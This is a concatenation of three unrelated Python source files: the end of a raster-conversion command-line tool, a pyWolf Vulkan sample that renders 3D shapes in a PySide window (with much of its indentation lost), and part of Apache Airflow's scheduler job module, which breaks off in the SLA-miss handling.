    parser.add_argument('-cache', help='cache output directory', dest='cache')
    parser.add_argument(
        '-config', help='Configuration file with default settings', dest='config')
    parser.add_argument(
        '-quality', help='JPEG quality if compression is jpeg', dest='quality')
    parser.add_argument('-prec', help='LERC precision', dest='prec')
    parser.add_argument(
        '-pyramids', help='Generate pyramids? [true/false/only/external]', dest='pyramids')
    parser.add_argument(
        '-tempinput', help='{} Path to copy -input raters before conversion'.format(optional), dest=CTEMPINPUT)
    parser.add_argument(
        '-tempoutput', help='Path to output converted rasters before moving to (-output) path. {} This is only required if -cloudupload is (true)'.format(optional), dest=CTEMPOUTPUT)
    parser.add_argument(
        '-clouddownload', help='Is -input a cloud storage? [true/false: default:false]', dest='clouddownload')
    parser.add_argument(
        '-cloudupload', help='Is -output a cloud storage? [true/false]', dest='cloudupload')
    parser.add_argument('-clouduploadtype', choices=['amazon', 'azure', 'google'],
                        help='Upload Cloud Type [amazon/azure]', dest='clouduploadtype')
    parser.add_argument('-clouddownloadtype', choices=['amazon', 'azure', 'google'],
                        help='Download Cloud Type [amazon/azure/google]', dest='clouddownloadtype')
    parser.add_argument(
        '-inputprofile', help='Input cloud profile name with credentials', dest=InputProfile)
    parser.add_argument(
        '-outputprofile', help='Output cloud profile name with credentials', dest=OutputProfile)
    parser.add_argument(
        '-inputbucket', help='Input cloud bucket/container name', dest='inputbucket')
    parser.add_argument(
        '-outputbucket', help='Output cloud bucket/container name', dest='outputbucket')
    parser.add_argument('-op', help='Utility operation mode [{}/{}/{}/{}/{}]'.format(
        COP_UPL, COP_NOCONVERT, COP_LAMBDA, COP_COPYONLY, COP_CREATEJOB), dest=Report.CHDR_OP)
    parser.add_argument(
        '-job', help='Name output job/log-prefix file name', dest='job')
    parser.add_argument('-hashkey', help='Hashkey for encryption to use in output paths for cloud storage. e.g. -hashkey=random@1. This will insert the encrypted text using the -hashkey (\'random\') as the first folder name for the output path', dest=CUSR_TEXT_IN_PATH)
    parser.add_argument(
        '-rasterproxypath', help='{} Path to auto-generate raster proxy files during the conversion process'.format(optional), dest='rasterproxypath')
    parser.add_argument(
        '-clonepath', help='Deprecated. Use (-rasterproxypath)', dest='clonepath')
    parser.add_argument(
        '-s3input', help='Deprecated. Use (-clouddownload)', dest='s3input')
    parser.add_argument(
        '-s3output', help='Deprecated. Use (-cloudupload)', dest='s3output')
    parser.add_argument('-queuelength', type=int,
                        help='No of simultaneous rasters to process in lambda function. To use with -op=lambda', dest=Lambda.queue_length)
    parser.add_argument(
        '-usetoken', help='Use token to access cloud data? [true/false: default:false]', dest=UseToken)
    parser.add_argument(
        '-timeit', help='Execution time details report', dest=CTimeIt)
    args = parser.parse_args()
    app = Application(args)
    # app.registerMessageCallback(messageDebug)
    if (not app.init()):
        return eFAIL
    # Time the whole run for the console summary printed below.
    jobStart = datetime.now()
    status = app.run()
    duration = (datetime.now() - jobStart).total_seconds()
    print('Time taken> {}s'.format(duration))
    return status
if __name__ == '__main__':
    # Run the tool and propagate the job status as the process exit code.
    ret = main()
    print('\nDone..')
    exit(ret)  # NOTE(review): sys.exit(ret) is the conventional form for scripts.
|
15_shapes.py | import sys, os
#get path of script
_script_path = os.path.realpath(__file__)
_script_dir = os.path.dirname(_script_path)
pyWolfPath = _script_dir
if sys.platform == "linux" or sys.platform == "linux2":
print "Linux not tested yet"
elif sys.platform == "darwin":
print "OS X not tested yet"
elif sys.platform == "win32":
pyWolfPath = pyWolfPath + "\\..\\..\\..\\..\\bin\\x64\\Debug\\Win32\\"
if pyWolfPath != "" and (not pyWolfPath in sys.path):
sys.path.append(pyWolfPath)
import ctypes, threading, pyWolf
from math import cos, sin
from PySide import QtGui, QtCore
from PySide.QtGui import *
from PySide.QtCore import *
screen_width = 800
screen_height = 600
class gui(QWidget):
    """Debug overlay widget: a single left-aligned label whose text is
    refreshed from ``debug_text`` every 50 ms by a QTimer."""

    def __init__(self, parent=None):
        super(gui, self).__init__(parent)
        # Text pushed in from outside (the scene's update callback).
        self.debug_text = ""
        # Label that displays the latest debug/FPS string.
        self._label = QLabel()
        self._label.setAlignment(Qt.AlignLeft)
        layout = QVBoxLayout()
        layout.addWidget(self._label)
        self.setLayout(layout)
        # Re-render the label text 20 times per second.
        refresh = QTimer(self)
        refresh.timeout.connect(self.updateTime)
        refresh.start(50)

    def updateTime(self):
        """Timer slot: copy the current debug text into the label."""
        self._label.setText(self.debug_text)
class scene(QWidget):
def __init__(self, pContentPath, pLogPath, pAppName, parent = None):
super(scene, self).__init__(parent)
self.__exiting = False
self._game = pyWolf.framework.w_game(pContentPath, pLogPath, pAppName)
self._game.set_pre_init_callback(self.pre_init)
self._game.set_post_init_callback(self.post_init)
self._game.set_load_callback(self.load)
self._game.set_update_callback(self.update)
self._game.set_pre_render_callback(self.pre_render)
self._game.set_post_render_callback(self.post_render)
self._gDevice = None
self._viewport = pyWolf.graphics.w_viewport()
self._viewport_scissor = pyWolf.graphics.w_viewport_scissor()
self._draw_command_buffers = pyWolf.graphics.w_command_buffers()
self._draw_render_pass = pyWolf.graphics.w_render_pass()
self._draw_fence = pyWolf.graphics.w_fences()
self._draw_semaphore = pyWolf.graphics.w_semaphore()
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._shape_line = pyWolf.graphics.w_shapes(
pyWolf.glm.vec3(0.0, 0.0, 0.0),
pyWolf.glm.vec3(3.0, 3.0, 3.0),
pyWolf.system.w_color.RED())
self._shape_triangle = pyWolf.graphics.w_shapes(
pyWolf.glm.vec3(-1.0, 0.0, 0.0),
pyWolf.glm.vec3(1.0, 0.0, 0.0),
pyWolf.glm.vec3(0.0, 2.0, 0.0),
pyWolf.system.w_color.GREEN())
self._shape_circle = pyWolf.graphics.w_shapes(
pyWolf.glm.vec3(0.0, 0.0, 0.0),
2.0,
pyWolf.system.w_color.ORANGE(),
pyWolf.system.w_plane.XY,
30)
_bounding_box = pyWolf.system.w_bounding_box()
_bounding_box.min = pyWolf.glm.vec3(-3.0, -3.0, -3.0)
_bounding_box.max = pyWolf.glm.vec3(3.0, 3.0, 3.0)
self._shape_box = pyWolf.graphics.w_shapes(_bounding_box, pyWolf.system.w_color.YELLOW())
_bounding_sphere = pyWolf.system.w_bounding_sphere()
_bounding_sphere.center = pyWolf.glm.vec3(0.0, 0.0, 0.0)
_bounding_sphere.radius = 3.0
_sphere_resolution = 30
self._shape_sphere = pyWolf.graphics.w_shapes(_bounding_sphere, pyWolf.system.w_color.PURPLE(), _sphere_resolution)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_config = pyWolf.graphics.w_graphics_device_manager_configs()
_config.debug_gpu = False
self._game.set_graphics_device_manager_configs(_config)
def pre_init(self):
print "pre_init"
def post_init(self):
#get main graphics device
self._gDevice = self._game.get_graphics_device(0)
print self._gDevice.get_info()
print "post_init"
def load(self):
#initialize viewport
self._viewport.y = 0
self._viewport.width = screen_width
self._viewport.height = screen_height
self._viewport.minDepth = 0
self._viewport.maxDepth = 1
#initialize scissor of viewport
self._viewport_scissor.offset.x = 0
self._viewport_scissor.offset.y = 0
self._viewport_scissor.extent.width = screen_width
self._viewport_scissor.extent.height = screen_height
#load render pass which contains frame buffers
_render_pass_attachments = []
_output_window = self._gDevice.output_presentation_window
for _iter in _output_window.swap_chain_image_views:
# COLOR #DEPTH
_render_pass_attachments.append([_iter, _output_window.depth_buffer_image_view])
_hr = self._draw_render_pass.load(self._gDevice, self._viewport, self._viewport_scissor, _render_pass_attachments)
if _hr:
print "Error on loading render pass"
self.release()
sys.exit(1)
#create one semaphore for drawing
_hr = self._draw_semaphore.initialize(self._gDevice)
if _hr:
print "Error on initializing semaphore"
self.release()
sys.exit(1)
#create one fence for drawing
_hr = self._draw_fence.initialize(self._gDevice, 1)
if _hr:
print "Error on initializing fence(s)"
self.release()
sys.exit(1)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_hr = self._shape_line.load(
self._gDevice,
self._draw_render_pass,
self._viewport,
self._viewport_scissor)
if _hr:
print "Error on loading shape line axis"
self.release()
sys.exit(1)
_hr = self._shape_triangle.load(
self._gDevice,
self._draw_render_pass,
self._viewport,
self._viewport_scissor)
if _hr:
print "Error on loading shape triangle axis"
self.release()
sys.exit(1)
_hr = self._shape_circle.load(
self._gDevice,
self._draw_render_pass,
self._viewport,
self._viewport_scissor)
if _hr:
print "Error on loading shape circle axis"
self.release()
sys.exit(1)
_hr = self._shape_box.load(
self._gDevice,
self._draw_render_pass,
self._viewport,
self._viewport_scissor)
if _hr:
print "Error on loading shape box axis"
self.release()
sys.exit(1)
_hr = self._shape_sphere.load(
self._gDevice,
self._draw_render_pass,
self._viewport,
self._viewport_scissor)
if _hr:
print "Error on loading shape shpere axis"
self.release()
sys.exit(1)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#create command buffers for drawing
number_of_swap_chains = self._gDevice.get_number_of_swap_chains()
_hr = self._draw_command_buffers.load(self._gDevice, number_of_swap_chains, pyWolf.graphics.w_command_buffer_level.PRIMARY)
if _hr:
print "Error on initializing draw command buffer(s)"
self.release()
sys.exit(1)
_hr = self.build_command_buffers()
if _hr:
print "Error on building command buffers"
self.release()
sys.exit(1)
print "scene loaded successfully"
def build_command_buffers(self):
_hr = pyWolf.W_PASSED
_size = self._draw_command_buffers.get_commands_size()
for i in xrange(_size):
_cmd = self._draw_command_buffers.get_command_at(i)
_hr = self._draw_command_buffers.begin(i)
if _hr:
print "Error on begining command buffer: " + str(i)
break
self._draw_render_pass.begin(i, _cmd, pyWolf.system.w_color.CORNFLOWER_BLUE(), 1.0, 0)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._shape_line.draw(_cmd)
self._shape_triangle.draw(_cmd)
self._shape_circle.draw(_cmd)
self._shape_box.draw(_cmd)
self._shape_sphere.draw(_cmd)
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._draw_render_pass.end(_cmd)
_hr = self._draw_command_buffers.end(i)
if _hr:
print "Error on ending command buffer: " + str(i)
break
return _hr
def update(self, pGameTime):
#Update label of gui widget
global _gui
_gui.debug_text = "FPS: " + str(pGameTime.get_frames_per_second()) + "\r\n\r\nFrameTime: " + str(pGameTime.get_elapsed_seconds()) + "\r\n\r\nTotalTime: " + str(pGameTime.get_total_seconds())
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
_pi = 3.14159265
_angle = pGameTime.get_total_seconds()
_eye = pyWolf.glm.vec3(cos(_angle * 0.5) * 15.0, 0.5 * 15.0, sin(_angle * 0.5) * 15.0)
_up = pyWolf.glm.vec3(0.0, -1.0, 0.0)
_look_at = pyWolf.glm.vec3(0.0, 0.0, 0.0)
_world = pyWolf.glm.mat4x4()
_view = pyWolf.lookAtRH(_eye, _look_at, _up)
_projection = pyWolf.perspectiveRH(
45.0 * _pi / 180.0,
self._viewport.width / self._viewport.height,
0.1,
1000.0)
_vp = pyWolf.multiply_matrices(_projection,_view)
_wvp = pyWolf.multiply_matrices(_vp,_world)
_hr = self._shape_line.update(_wvp)
if _hr:
print "Error on updating shape line"
_hr = self._shape_triangle.update(_wvp)
if _hr:
print "Error on updating shape triangle"
_hr = self._shape_circle.update(_wvp)
if _hr:
print "Error on updating shape circle"
_hr = self._shape_box.update(_wvp)
if _hr:
print "Error on updating shape box"
_hr = self._shape_sphere.update(_wvp)
if _hr:
print "Error on updating shape sphere"
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
def pre_render(self, pGameTime):
_output_window = self._gDevice.output_presentation_window
_frame_index = _output_window.swap_chain_image_index
_wait_dst_stage_mask = [ pyWolf.graphics.w_pipeline_stage_flag_bits.COLOR_ATTACHMENT_OUTPUT_BIT ]
_wait_semaphores = [ _output_window.swap_chain_image_is_available_semaphore ]
_signal_semaphores = [ _output_window.rendering_done_semaphore ]
_cmd = self._draw_command_buffers.get_command_at(_frame_index)
#reset draw fence
self._draw_fence.reset()
_hr = self._gDevice.submit(
[_cmd],
self._gDevice.graphics_queue,
_wait_dst_stage_mask,
_wait_semaphores,
_signal_semaphores,
self._draw_fence)
if _hr:
print "Error on submiting queue for final drawing"
return
_hr = self._draw_fence.wait()
if _hr:
print "Error on waiting for draw fence"
return
def post_render(self, pSuccessfullyRendered):
if pSuccessfullyRendered == False:
print "Rendered Unsuccessfully"
def run(self):
#run game
_window_info = pyWolf.system.w_window_info()
_window_info.width = self.width()
_window_info.height = self.height()
_window_info.v_sync_enable = False
_window_info.is_full_screen = False
_window_info.swap_chain_format = 44 # BGRA8Unorm in VULKAN
_window_info.cpu_access_swap_chain_buffer = False
# get window handle
pycobject_hwnd = self.winId()
#convert window handle as HWND to unsigned integer pointer for c++
ctypes.pythonapi.PyCObject_AsVoidPtr.restype = ctypes.c_void_p
ctypes.pythonapi.PyCObject_AsVoidPtr.argtypes = [ctypes.py_object]
int_hwnd = ctypes.pythonapi.PyCObject_AsVoidPtr(pycobject_hwnd)
_window_info.set_win_id(int_hwnd)
#initialize game
_map_info = (0, _window_info)
while True:
if self.__exiting:
self.release()
break
self._game.run(_map_info)
print "Game exited"
def showEvent(self, event):
#run in another thread
threading.Thread(target=self.run).start()
event.accept()
def closeEvent(self, event):
self.__exiting = True
event.accept()
def keyPressEvent(self, event):
_key = event.key()
if _key == QtCore.Qt.Key.Key_Escape:
self.__exiting = True
def release(self):
self._draw_fence.release()
self._draw_fence = None
self._draw_semaphore.release()
self._draw_semaphore = None
self._draw_command_buffers.release()
self._draw_command_buffers = None
self._draw_render_pass.release()
self._draw_render_pass = None
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#The following codes have been added for this project
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._shape_line.release()
self._shape_line = None
self._shape_triangle.release()
self._shape_triangle = None
self._shape_circle.release()
self._shape_circle = None
self._shape_box.release()
self._shape_box = None
self._shape_sphere.release()
self._shape_sphere = None
#++++++++++++++++++++++++++++++++++++++++++++++++++++
#++++++++++++++++++++++++++++++++++++++++++++++++++++
self._game.release()
self._game = None
self._gDevice = None
self._viewport = None
self._viewport_scissor = None
if __name__ == '__main__':
    # Create a Qt application
    _app = QApplication(sys.argv)
    #Init gui (the debug/FPS overlay widget), at half the render window size.
    _gui = gui()
    _gui.resize(screen_width /2, screen_height /2)
    _gui.setWindowTitle('Wolf.Engine Debug')
    #Init scene
    # NOTE(review): app name says 'py_11_pipeline' though this sample is
    # 15_shapes — presumably copied from an earlier sample; confirm intended.
    _scene = scene(pyWolfPath + "..\\..\\..\\..\\content\\",
                   pyWolfPath,
                   "py_11_pipeline")
    _scene.resize(screen_width, screen_height)
    _scene.setWindowTitle('Wolf.Engine')
    #Show all widgets
    _scene.show()
    _gui.show()
    sys.exit(_app.exec_())
|
scheduler_job.py | # -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from typing import List, Set
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow import executors, models, settings
from airflow.configuration import conf
from airflow.exceptions import AirflowException
from airflow.jobs.base_job import BaseJob
from airflow.models import DAG, DagRun, SlaMiss, errors
from airflow.stats import Stats
from airflow.ti_deps.dep_context import SCHEDULEABLE_STATES, SCHEDULED_DEPS, DepContext
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (
AbstractDagFileProcessor, DagFileProcessorAgent, SimpleDag, SimpleDagBag, SimpleTaskInstance,
list_py_file_paths,
)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_id_white_list: If specified, only look at these DAG ID's
:type dag_id_white_list: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_id_white_list, zombies):
    """Store the processing parameters; the child process itself is only
    created later in start()."""
    self._file_path = file_path
    # The process that was launched to process the given file path.
    self._process = None
    self._dag_id_white_list = dag_id_white_list
    self._pickle_dags = pickle_dags
    self._zombies = zombies
    # The result of Scheduler.process_file(file_path).
    self._result = None
    # Whether the process is done running.
    self._done = False
    # When the process started.
    self._start_time = None
    # This ID is used to uniquely name the process / thread that's launched
    # by this processor instance.
    # NOTE(review): the read-then-increment of the class counter is not
    # atomic; fine if instances are only created from one thread — confirm.
    self._instance_id = DagFileProcessor.class_creation_counter
    DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
    """Path of the DAG definition file this processor works on."""
    return self._file_path
@staticmethod
def _run_file_processor(result_channel,
                        file_path,
                        pickle_dags,
                        dag_id_white_list,
                        thread_name,
                        zombies):
    """
    Process the given file.

    :param result_channel: the connection to use for passing back the result
    :type result_channel: multiprocessing.Connection
    :param file_path: the file to process
    :type file_path: unicode
    :param pickle_dags: whether to pickle the DAGs found in the file and
        save them to the DB
    :type pickle_dags: bool
    :param dag_id_white_list: if specified, only examine DAG ID's that are
        in this list
    :type dag_id_white_list: list[unicode]
    :param thread_name: the name to use for the process that is launched
    :type thread_name: unicode
    :param zombies: zombie task instances to kill
    :type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
    :return: the process that was launched
    :rtype: multiprocessing.Process
    """
    # This helper runs in the newly created process
    log = logging.getLogger("airflow.processor")
    # Route anything the DAG file prints to the processor log.
    stdout = StreamLogWriter(log, logging.INFO)
    stderr = StreamLogWriter(log, logging.WARN)
    set_context(log, file_path)
    setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
    try:
        # redirect stdout/stderr to log
        sys.stdout = stdout
        sys.stderr = stderr
        # Re-configure the ORM engine as there are issues with multiple processes
        settings.configure_orm()
        # Change the thread name to differentiate log lines. This is
        # really a separate process, but changing the name of the
        # process doesn't work, so changing the thread name instead.
        threading.current_thread().name = thread_name
        start_time = time.time()
        log.info("Started process (PID=%s) to work on %s",
                 os.getpid(), file_path)
        scheduler_job = SchedulerJob(dag_ids=dag_id_white_list, log=log)
        result = scheduler_job.process_file(file_path,
                                            zombies,
                                            pickle_dags)
        # Hand the result back to the parent over the pipe.
        result_channel.send(result)
        end_time = time.time()
        log.info(
            "Processing %s took %.3f seconds", file_path, end_time - start_time
        )
    except Exception:
        # Log exceptions through the logging framework.
        log.exception("Got an exception! Propagating...")
        raise
    finally:
        result_channel.close()
        # Restore the real stdio even if processing raised.
        sys.stdout = sys.__stdout__
        sys.stderr = sys.__stderr__
        # We re-initialized the ORM within this Process above so we need to
        # tear it down manually here
        settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
self._parent_channel, _child_channel = multiprocessing.Pipe()
self._process = multiprocessing.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_id_white_list,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
self._process.join(5)
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
    @property
    def done(self):
        """
        Check if the process launched to process this file is done.

        As a side effect, when the child has sent its result this reads it
        off the pipe into ``self._result``, joins the process, and closes
        the parent end of the channel.

        :return: whether the process is finished running
        :rtype: bool
        """
        if self._process is None:
            raise AirflowException("Tried to see if it's done before starting!")
        if self._done:
            return True
        # poll() is non-blocking: only recv() when data is already waiting,
        # so this property never blocks the scheduler loop.
        if self._parent_channel.poll():
            try:
                self._result = self._parent_channel.recv()
                self._done = True
                self.log.debug("Waiting for %s", self._process)
                self._process.join()
                self._parent_channel.close()
                return True
            except EOFError:
                # Child closed its end without sending a result; fall through
                # to the liveness check below.
                pass
        if not self._process.is_alive():
            # Process exited without sending anything; there is no result.
            self._done = True
            self.log.debug("Waiting for %s", self._process)
            self._process.join()
            self._parent_channel.close()
            return True
        return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
    def __init__(
            self,
            dag_id=None,
            dag_ids=None,
            subdir=settings.DAGS_FOLDER,
            num_runs=conf.getint('scheduler', 'num_runs'),
            processor_poll_interval=conf.getfloat('scheduler', 'processor_poll_interval'),
            do_pickle=False,
            log=None,
            *args, **kwargs):
        """
        Create a SchedulerJob.

        :param dag_id: if specified, only schedule tasks with this DAG ID
        :param dag_ids: if specified, only schedule tasks with these DAG IDs
        :param subdir: directory containing Python files with Airflow DAG
            definitions, or a specific path to a file
        :param num_runs: how many times to try to schedule each DAG file;
            -1 for unlimited
        :param processor_poll_interval: seconds to wait between polls of
            running processors
        :param do_pickle: whether to serialize DAG objects to the DB
        :param log: optional logger to use instead of the class default
        """
        # for BaseJob compatibility
        self.dag_id = dag_id
        self.dag_ids = [dag_id] if dag_id else []
        if dag_ids:
            self.dag_ids.extend(dag_ids)
        self.subdir = subdir
        self.num_runs = num_runs
        self._processor_poll_interval = processor_poll_interval
        self.do_pickle = do_pickle
        super().__init__(*args, **kwargs)
        self.max_threads = conf.getint('scheduler', 'max_threads')
        if log:
            self._log = log
        # SQLite cannot handle concurrent writers, so parts of the scheduler
        # fall back to single-threaded behaviour when it is the backend.
        self.using_sqlite = False
        if 'sqlite' in conf.get('core', 'sql_alchemy_conn'):
            self.using_sqlite = True
        self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
        self.processor_agent = None
        # Shut down cleanly (and stop child processors) on Ctrl-C / SIGTERM.
        signal.signal(signal.SIGINT, self._exit_gracefully)
        signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super().is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).seconds < scheduler_health_check_threshold
)
    @provide_session
    def manage_slas(self, dag, session=None):
        """
        Finding all tasks that have SLAs defined, and sending alert emails
        where needed. New SLA misses are also recorded in the database.
        We are assuming that the scheduler runs often, so we only check for
        tasks that should have succeeded in the past hour.
        """
        # No task in the DAG declares an SLA -> nothing to do.
        if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
            self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
            return
        TI = models.TaskInstance
        # For each task, find the latest SUCCESS/SKIPPED execution date.
        sq = (
            session
            .query(
                TI.task_id,
                func.max(TI.execution_date).label('max_ti'))
            .with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
            .filter(TI.dag_id == dag.dag_id)
            .filter(or_(
                TI.state == State.SUCCESS,
                TI.state == State.SKIPPED))
            .filter(TI.task_id.in_(dag.task_ids))
            .group_by(TI.task_id).subquery('sq')
        )
        max_tis = session.query(TI).filter(
            TI.dag_id == dag.dag_id,
            TI.task_id == sq.c.task_id,
            TI.execution_date == sq.c.max_ti,
        ).all()
        ts = timezone.utcnow()
        for ti in max_tis:
            task = dag.get_task(ti.task_id)
            dttm = ti.execution_date
            if isinstance(task.sla, timedelta):
                # Walk every schedule after the last successful run up to now,
                # recording an SlaMiss for each period that blew its SLA.
                dttm = dag.following_schedule(dttm)
                while dttm < timezone.utcnow():
                    following_schedule = dag.following_schedule(dttm)
                    if following_schedule + task.sla < timezone.utcnow():
                        session.merge(SlaMiss(
                            task_id=ti.task_id,
                            dag_id=ti.dag_id,
                            execution_date=dttm,
                            timestamp=ts))
                    dttm = dag.following_schedule(dttm)
        session.commit()
        # Misses that have not yet triggered a notification.
        slas = (
            session
            .query(SlaMiss)
            .filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id)  # noqa pylint: disable=singleton-comparison
            .all()
        )
        if slas:
            sla_dates = [sla.execution_date for sla in slas]
            # Task instances that may be blocking the missed runs.
            qry = (
                session
                .query(TI)
                .filter(
                    TI.state != State.SUCCESS,
                    TI.execution_date.in_(sla_dates),
                    TI.dag_id == dag.dag_id
                ).all()
            )
            blocking_tis = []
            for ti in qry:
                if ti.task_id in dag.task_ids:
                    ti.task = dag.get_task(ti.task_id)
                    blocking_tis.append(ti)
                else:
                    # Task was removed from the DAG; drop the stale TI row.
                    session.delete(ti)
                    session.commit()
            task_list = "\n".join([
                sla.task_id + ' on ' + sla.execution_date.isoformat()
                for sla in slas])
            blocking_task_list = "\n".join([
                ti.task_id + ' on ' + ti.execution_date.isoformat()
                for ti in blocking_tis])
            # Track whether email or any alert notification sent
            # We consider email or the alert callback as notifications
            email_sent = False
            notification_sent = False
            if dag.sla_miss_callback:
                # Execute the alert callback
                self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
                try:
                    dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
                                          blocking_tis)
                    notification_sent = True
                except Exception:
                    # Best-effort: a broken callback must not break scheduling.
                    self.log.exception("Could not call sla_miss_callback for DAG %s",
                                       dag.dag_id)
            email_content = """\
            Here's a list of tasks that missed their SLAs:
            <pre><code>{task_list}\n<code></pre>
            Blocking tasks:
            <pre><code>{blocking_task_list}\n{bug}<code></pre>
            """.format(task_list=task_list, blocking_task_list=blocking_task_list,
                       bug=asciiart.bug)
            # Collect the union of all task-level alert addresses in the DAG.
            emails = set()
            for task in dag.tasks:
                if task.email:
                    if isinstance(task.email, str):
                        emails |= set(get_email_address_list(task.email))
                    elif isinstance(task.email, (list, tuple)):
                        emails |= set(task.email)
            if emails:
                try:
                    send_email(
                        emails,
                        "[airflow] SLA miss on DAG=" + dag.dag_id,
                        email_content)
                    email_sent = True
                    notification_sent = True
                except Exception:
                    # Best-effort: a broken SMTP setup must not break scheduling.
                    self.log.exception("Could not send SLA Miss email notification for"
                                       " DAG %s", dag.dag_id)
            # If we sent any notification, update the sla_miss table
